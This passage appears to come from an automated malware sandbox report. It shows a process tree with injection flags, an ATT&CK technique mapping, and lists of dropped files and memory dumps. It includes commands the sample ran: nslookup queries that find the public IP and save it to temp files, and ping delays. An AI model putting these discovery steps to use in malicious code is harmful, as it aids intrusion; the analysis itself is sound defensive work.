- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Runs ping.exe
PID:1840

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2D3D.bi1"
2⤵
- Suspicious use of WriteProcessMemory
PID:3536

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:1900

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2B39.bi1"
2⤵
PID:3780

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:4080

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2D3D.bi1"
2⤵
PID:1624

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2B39.bi1"
2⤵
PID:496

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3372

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1936

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:82945 /prefetch:2
2⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
PID:420

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:82952 /prefetch:2
2⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
PID:3772

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

2

T1081

Discovery

Query Registry

3

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

2

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\Local\Temp\2B39.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2B39.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2D3D.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2D3D.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES971A.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES97E5.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.dll

Download Submit
C:\Users\Admin\Documents\dDdoiBj.ocx

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cfsntbwc\CSCF1148159F8FE457CB2B022E98816BEF7.TMP

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.0.cs

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.cmdline

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\CSCF6EAB5B4A5044976A1B55CBDFE26C71B.TMP

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.0.cs

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.cmdline

Download Submit
\Users\Admin\Documents\dDdoiBj.ocx

Download Submit
memory/420-75-0x0000000000000000-mapping.dmp

Download
memory/496-101-0x0000000000000000-mapping.dmp

Download
memory/1192-6-0x0000000000310000-0x0000000000319000-memory.dmp

Filesize
36KB

Download
memory/1192-4-0x0000000000310000-0x0000000000319000-memory.dmp

Filesize
36KB

Download
memory/1192-5-0x0000000000312960-mapping.dmp

Download
memory/1608-7-0x0000000000000000-mapping.dmp

Download
memory/1624-100-0x0000000000000000-mapping.dmp

Download
memory/1840-94-0x0000000000000000-mapping.dmp

Download
memory/1840-95-0x000000E737CA2000-mapping.dmp

Download
memory/1900-98-0x0000000000000000-mapping.dmp

Download
memory/1944-9-0x000000000BC01067-mapping.dmp

Download
memory/1944-10-0x000000000BC00000-0x000000000BC12000-memory.dmp

Filesize
72KB

Download
memory/1944-8-0x000000000BC00000-0x000000000BC12000-memory.dmp

Filesize
72KB

Download
memory/2044-77-0x0000000000000000-mapping.dmp

Download
memory/2052-78-0x0000000000000000-mapping.dmp

Download
memory/2064-0-0x0000000000000000-mapping.dmp

Download
memory/2108-14-0x0000000001056000-0x0000000001057000-memory.dmp

Filesize
4KB

Download
memory/2108-15-0x0000000001240000-0x0000000001241000-memory.dmp

Filesize
4KB

Download
memory/2108-11-0x0000000000000000-mapping.dmp

Download
memory/2204-21-0x0000000000000000-mapping.dmp

Download
memory/2204-74-0x00000000034C0000-0x00000000034C1000-memory.dmp

Filesize
4KB

Download
memory/2204-73-0x0000000000000000-mapping.dmp

Download
memory/2204-2-0x0000000000000000-mapping.dmp

Download
memory/2204-72-0x0000000000000000-mapping.dmp

Download
memory/2204-22-0x0000000000000000-mapping.dmp

Download
memory/2204-20-0x0000000000000000-mapping.dmp

Download
memory/2884-19-0x0000000004F30000-0x0000000004F31000-memory.dmp

Filesize
4KB

Download
memory/2884-24-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/3192-85-0x0000000000000000-mapping.dmp

Download
memory/3504-92-0x0000000000000000-mapping.dmp

Download
memory/3504-93-0x000000ED6BA2E000-mapping.dmp

Download
memory/3536-96-0x0000000000000000-mapping.dmp

Download
memory/3768-88-0x0000000000000000-mapping.dmp

Download
memory/3772-76-0x0000000000000000-mapping.dmp

Download
memory/3780-97-0x0000000000000000-mapping.dmp

Download
memory/4016-81-0x0000000000000000-mapping.dmp

Download
memory/4080-99-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads